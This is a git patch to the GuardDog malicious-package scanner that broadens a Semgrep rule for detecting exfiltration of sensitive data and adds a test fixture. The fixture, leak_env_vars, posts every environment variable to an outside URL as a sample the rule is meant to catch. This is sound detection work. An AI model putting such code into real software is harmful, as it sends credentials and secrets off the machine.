From 6f283f19d1f849554e8cf5a692586655348c245a Mon Sep 17 00:00:00 2001
From: Ian Kretz <44385082+ikretz@users.noreply.github.com>
Date: Fri, 25 Oct 2024 07:07:07 -0500
Subject: [PATCH] Enhance Python data exfiltration rule (#475)

---
 guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml | 2 +-
 tests/analyzer/sourcecode/exfiltrate-sensitive-data.py     | 7 +++++++
 2 files changed, 8 insertions(+), 1 deletion(-)

diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
index 605ee395..9400a53b 100644
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -5,7 +5,7 @@ rules:
     metadata:
       description: Identify when a package reads and exfiltrates sensitive data from the local system
     pattern-sources:
-      - pattern: os.environ.items()
+      - pattern: os.environ
       - pattern: '[... for ... in os.environ.items()]'
       - pattern: socket.gethostname()
       - pattern: getpass.getuser()
diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
index 05ba1867..b386e803 100644
--- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
+++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
@@ -172,6 +172,13 @@ def checkVersion():
 req.read()
 
 
+def leak_env_vars():
+    env_vars = os.environ
+    url = "https://www.datadoghq.com/"
+    # ruleid: exfiltrate-sensitive-data
+    requests.post(url, json=dict(env_vars))
+
+
 """ RULEID: CTX
 """